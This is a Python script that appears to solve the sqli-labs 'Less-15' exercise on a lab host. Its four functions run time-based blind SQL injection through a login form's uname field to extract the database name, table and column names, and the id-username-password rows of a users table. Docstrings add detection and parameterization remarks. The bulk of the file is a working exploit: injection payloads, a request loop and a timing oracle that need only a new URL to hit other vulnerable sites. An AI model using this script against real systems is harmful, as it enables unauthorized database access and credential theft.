Less15import requests
from datetime import datetime
# Lab target: the sqli-labs "Less-15" login exercise on a private-range host.
# Every function below reuses this one endpoint; the login handler itself is
# not on this page, but the payloads only make sense if it builds its SQL by
# interpolating the uname form field, which a parameterized query would stop.
url = "http://192.168.232.132/sqli-labs/Less-15/"
def database():
    """Recover the current schema name from the lab, one character per pass.

    Each POST sends the login form with a ``uname`` value that closes the
    string literal and appends ``and if(ascii(substring(database(),j,1))=i,
    sleep(2),1)#``. The server's answer is read purely from elapsed
    wall-clock time; the response object ``res`` is never inspected.
    Positions 1..10 are tried with candidate ASCII codes 65..122, the
    partial string is printed after every hit and the final string once.

    Defender's view: the oracle exists only because the field reaches the
    query unparameterized. In logs this looks like a burst of POSTs to the
    login form whose bodies contain ``sleep(`` / ``if(`` and whose
    response times cluster around 2 s.
    """
    # NOTE(review): indentation reconstructed from a whitespace-mangled paste.
    j = 1       # 1-based character position within database()
    s = ''      # characters recovered so far
    for _ in range(10):
        for i in range(65, 123):
            payload = {
                # Chaining with `and` only works when the preceding condition
                # is also true in the database, i.e. the 'Dumb' user exists.
                "uname":f"Dumb' and if(ascii(substring(database(),{j},1))={i},sleep(2),1)#",
                "passwd":"1"}
            start_time = datetime.now()
            res = requests.post(url=url,data=payload)
            used_time = datetime.now() - start_time
            # timedelta.seconds is whole seconds: a sleep(2) branch reads as
            # >= 2, an immediate reply as 0, so the threshold sits between.
            if(used_time.seconds > 1):
                s = s + chr(i)
                print(s)
        j += 1
    print(s)
def table():
    """Recover the comma-joined table names of the current schema.

    Same timing oracle as ``database()``: the injected ``if(...)`` compares
    one character of ``group_concat(table_name)`` (from
    ``information_schema.tables`` filtered to ``database()``) against the
    candidate code ``i`` and sleeps 2 s on a match. Positions 1..20 are
    tried with ASCII codes 23..122; ``res`` is ignored, only elapsed time
    is used. Prints the partial string on each hit and the result at the end.

    Defender's view: reads of ``information_schema`` driven from a login
    form are a strong detection signal on their own, independent of the
    ``sleep(`` marker; the root-cause fix is parameterizing the query.
    """
    # NOTE(review): indentation reconstructed from a whitespace-mangled paste.
    j = 1       # 1-based position in the group_concat() string
    s = ''      # characters recovered so far
    for _ in range(20):
        for i in range(23, 123):
            payload = {
                # Chaining with `and` only works when the preceding condition
                # is also true in the database, i.e. the 'Dumb' user exists.
                "uname":f"Dumb' and if(ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema=database() ),{j},1))={i},sleep(2),1)#",
                "passwd":"1"}
            start_time = datetime.now()
            res = requests.post(url=url,data=payload)
            used_time = datetime.now() - start_time
            # Whole-second comparison: only a reply delayed by the sleep(2)
            # branch exceeds 1 here.
            if(used_time.seconds > 1):
                s = s + chr(i)
                print(s)
        j += 1
    print(s)
def column():
    """Recover the column names of the ``users`` table, joined by ``-``.

    The injected condition compares one character of
    ``group_concat(column_name, 0x2d)`` (``information_schema.columns`` for
    the current schema and ``table_name='users'``, ``limit 0,1``) against
    the candidate code ``i`` and sleeps 2 s on a match. Positions 1..10 are
    tried with ASCII codes 23..122. Unlike ``database()`` and ``table()``
    there is no final print: the partial string is printed on each hit and
    nothing is returned, so the result lives only in stdout.

    Defender's view: same unparameterized login query as the other
    functions; the ``0x2d`` hex literal and ``information_schema`` reference
    inside a form field are both out-of-place for legitimate traffic.
    """
    # NOTE(review): indentation reconstructed from a whitespace-mangled paste.
    j = 1       # 1-based position in the group_concat() string
    s = ''      # characters recovered so far
    for _ in range(10):
        for i in range(23, 123):
            payload = {
                # Chaining with `and` only works when the preceding condition
                # is also true in the database, i.e. the 'Dumb' user exists.
                "uname":f"Dumb' and if(ascii(substring((select group_concat(column_name,0x2d) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),{j},1))={i},sleep(2),1)#",
                "passwd":"1"}
            start_time = datetime.now()
            res = requests.post(url=url,data=payload)
            used_time = datetime.now() - start_time
            # Whole-second comparison: only a reply delayed by the sleep(2)
            # branch exceeds 1 here.
            if(used_time.seconds > 1):
                s = s + chr(i)
                print(s)
        j += 1
def data():
    """Recover ``id-username-password`` rows from the lab's ``users`` table.

    The injected condition compares one character of
    ``group_concat(id, 0x2d, username, 0x2d, password)`` from ``users``
    (``limit 0,1``) against the candidate code ``i`` and sleeps 2 s on a
    match. Positions 1..100 are tried with ASCII codes 23..122. As in
    ``column()`` there is no final print and no return value; progress is
    only visible through the per-hit ``print(s)``.

    Defender's view: this is the stage where the lab's credentials leave
    the database, which is why the parameterization fix matters for the
    whole login path and not just for the name-enumeration steps; the
    traffic signature (many POSTs, ~2 s responses, ``sleep(`` in the body)
    is the same as in the other functions.
    """
    # NOTE(review): indentation reconstructed from a whitespace-mangled paste.
    j = 1       # 1-based position in the group_concat() string
    s = ''      # characters recovered so far
    for _ in range(100):
        for i in range(23, 123):
            payload = {
                # Chaining with `and` only works when the preceding condition
                # is also true in the database, i.e. the 'Dumb' user exists.
                "uname":f"Dumb' and if(ascii(substring((select group_concat(id,0x2d,username,0x2d,password) from users limit 0,1),{j},1))={i},sleep(2),1)#",
                "passwd":"1"}
            start_time = datetime.now()
            res = requests.post(url=url,data=payload)
            used_time = datetime.now() - start_time
            # Whole-second comparison: only a reply delayed by the sleep(2)
            # branch exceeds 1 here.
            if(used_time.seconds > 1):
                s = s + chr(i)
                print(s)
        j += 1
# Once group_concat has aggregated the rows there is no need for `limit` to
# pull them one at a time; the whole set comes back in a single string.
# (Translated from the original Chinese comment.)
# Script entry point: only the table-name step runs; database(), column()
# and data() are defined above but not called from here.
table()